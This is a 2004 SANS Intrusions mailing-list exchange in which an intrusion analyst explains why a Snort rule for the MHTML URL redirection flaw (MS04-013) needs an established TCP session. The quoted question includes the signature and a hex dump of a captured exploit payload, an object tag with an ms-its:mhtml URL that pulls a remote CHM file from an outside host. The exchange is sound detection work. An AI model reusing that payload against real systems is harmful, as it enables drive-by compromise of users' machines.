[Intrusions] mhtml signature
Judy Novak
judy.novak at sourcefire.com
Wed Aug 4 17:26:12 GMT 2004
Lola,
An "established" session is one where the TCP 3-way handshake has
occurred and valid data is exchanged between the hosts. This is
absolutely what you want in the signature because you really only care
about valid data being exchanged. Without the 3-way handshake, this
could just be a bogus packet sent by someone trying to get Snort to
alert. There were tools such as stick and snot that did this long ago
before Snort kept state of TCP sessions.
You should look in your tcpdump session and make sure that you collected
the packets associated with the 3-way handshake for the packet that
you've captured for this rule. If they are not there, this rule will not
fire as written.
Judy
lola marais wrote:
> I have been working on a problem and require the assistance of the
> broader list community.
> Credit is given to the owner of this signature at
> http://sourceforge.net/mailarchive/message.php?msg_id=7758516
>
>
> I am planning on using this signature for a detect in part 2 my GCIA
> practical.
>
> The problem is that I am not able to get it working 100% with the data
> that i have. By not working I mean that it will miss the single packet
> that I have captured.
>
> I have captured some data from a network using tcpdump. The capture
> contains the data content required to trigger the event. The capture
> contains a single packet for that session, no more.
>
> When I read the data past snort with the signature enabled, then NO
> alerts are triggered. If I remove the part of the signature
> “flow:from_server,established” and then pass the same data I have 1 event
>
> The signature looks for an established connection.
> My question is:
>
> 1. Why has the author of the signature decide to look for an
> established connection?
> 2. Does the signature stand a chance of missing some events by looking
> only for established connections?
>
> The current version of the signature has the following structure.
>
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL
> Redirection Attempt"; flow:from_server,established;
> content:"mhtml|3A|file|3A|"; nocase; reference:cve,CAN-2004-0380;
> reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
> classtype:web-application-attack; rev:2;)
>
> The data packet that I have captured looks as follows:
>
> 07/28/04-11:23:51.262652 MAC:removed -> MAC:removed type:0x800 len:0xC2
> Proxy:ProxyPort -> InternalHost:4003 TCP TTL:63 TOS:0x0 ID:33030
> IpLen:20 DgmLen:176 DF
> ***AP**F Seq: 0xDC274ADF Ack: 0x2B3B3965 Win: 0xC1E8 TcpLen: 20
> 0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00 ..BB....2..q..E.
> 0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6 .... at .?.+.......
> 0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19 .R.L...'J.+;9eP.
> 0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63 ..p... <objec
> 0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D t data="ms-
> 0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F its:mhtml:file:/
> 0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70 /C:\foo.mht!http
> 0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F
> ://www.<blocked> free32.co
> 0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65 m/POP.CHM::/save
> 0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65 andrun.htm" type
> 0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C ="text/x-scriptl
> 0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F et"></object> ..
> 0x00C0: CA 27 .'
>
> =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
>
> _________________________________________________________________
> Death to pop-up ads! Get the ultimate toolbar today.
> http://toolbar.msn.co.za?DI=1054&XAPID=2083
>
> _______________________________________________
> Intrusions mailing list
> Intrusions at lists.sans.org
> http://www.dshield.org/mailman/listinfo/intrusions
>
More information about the Intrusions
mailing list